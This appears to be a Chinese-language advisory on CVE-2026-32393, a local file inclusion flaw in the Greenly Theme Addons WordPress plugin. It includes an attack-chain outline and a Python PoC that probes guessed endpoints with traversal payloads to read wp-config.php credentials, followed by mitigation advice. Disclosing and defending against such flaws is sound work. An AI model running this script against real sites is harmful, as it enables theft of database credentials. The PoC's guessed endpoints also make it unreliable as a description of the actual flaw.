CVE-2026-32393 Greenly Theme Addons本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2026-32393

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Creatives_Planet Greenly Theme Addons (greenly-addons)

漏洞概述

CVE-2026-32393是WordPress插件Greenly Theme Addons（greenly-addons）中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含类别中的本地文件包含（Local File Inclusion, LFI）漏洞。漏洞根源在于应用程序对文件名参数缺乏充分的验证和过滤，攻击者可以通过构造恶意请求利用程序的include或require语句包含服务器上的任意本地文件。在某些配置下，攻击者甚至可能通过目录遍历技术结合文件包含实现远程代码执行，从而完全控制受影响的Web服务器。此漏洞影响插件8.2版本之前的所有版本，建议用户立即升级到最新修复版本以消除安全风险。

技术细节

该漏洞存在于greenly-addons插件的文件处理逻辑中，具体表现为对用户可控的文件路径参数缺少严格的输入验证。攻击者可以通过HTTP请求向目标服务器发送包含文件路径的恶意参数，插件在处理这些参数时直接将其传递给PHP的include/require语句，导致本地文件被包含执行。典型的攻击场景中，攻击者会尝试包含PHP配置文件（如wp-config.php）以获取数据库凭证等敏感信息，或者包含日志文件写入恶意PHP代码后进行包含利用。由于WordPress插件通常以较高权限运行，此漏洞可能为攻击者提供读取服务器敏感文件或执行任意代码的机会。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别运行Greenly Theme Addons插件的WordPress站点

STEP 2

步骤2

漏洞探测：攻击者尝试访问插件的可利用端点，如loader.php

STEP 3

步骤3

构造恶意请求：攻击者构造包含目录遍历序列的HTTP请求，指定目标文件路径作为参数

STEP 4

步骤4

文件包含利用：服务器端插件接收参数后，未经充分验证即传递给include/require语句

STEP 5

步骤5

敏感信息获取：攻击者成功读取wp-config.php等敏感文件，获取数据库凭证等重要信息

STEP 6

步骤6

远程代码执行（可选）：攻击者可通过日志污染或上传恶意文件后包含执行，实现完全控制服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-32393 PoC - Greenly Theme Addons LFI
# Target: WordPress site with vulnerable greenly-addons plugin

import requests
import argparse

def test_lfi(target_url, filename='wp-config.php'):
    """
    Test for Local File Inclusion vulnerability
    Attempts to include wp-config.php or other sensitive files
    """
    # Common vulnerable parameter patterns
    params = {
        'file': f'../../../../../../../../{filename}',
        'template': f'../../../../../../../../{filename}',
        'page': f'../../../../../../../../{filename}',
        'action': f'../../../../../../../../{filename}'
    }
    
    # Common vulnerable endpoints
    endpoints = [
        '/wp-content/plugins/greenly-addons/includes/loader.php',
        '/wp-content/plugins/greenly-addons/public/partials/loader.php',
        '/wp-content/themes/greenly/inc/loader.php'
    ]
    
    print(f'[*] Testing target: {target_url}')
    print(f'[*] Attempting to include: {filename}')
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f'\n[*] Testing endpoint: {url}')
        
        for param_name, payload in params.items():
            try:
                response = requests.get(url, params={param_name: payload}, timeout=10)
                
                # Check for successful inclusion
                if 'DB_NAME' in response.text or 'define' in response.text:
                    print(f'[+] VULNERABLE! Parameter: {param_name}')
                    print(f'[+] Payload: {payload}')
                    print(f'[+] Response length: {len(response.text)}')
                    return True
            except requests.RequestException as e:
                print(f'[-] Request failed: {e}')
    
    print('[-] No vulnerable endpoint found')
    return False

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2026-32393 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-f', '--file', default='wp-config.php', help='File to include')
    args = parser.parse_args()
    
    test_lfi(args.target, args.file)

影响范围

greenly-addons < 8.2

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1）禁用或删除greenly-addons插件；2）通过Web应用防火墙（WAF）规则阻止包含敏感文件路径的请求；3）限制PHP的allow_url_include和open_basedir配置；4）实施严格的文件访问权限控制；5）启用WordPress安全插件进行实时监控和防护。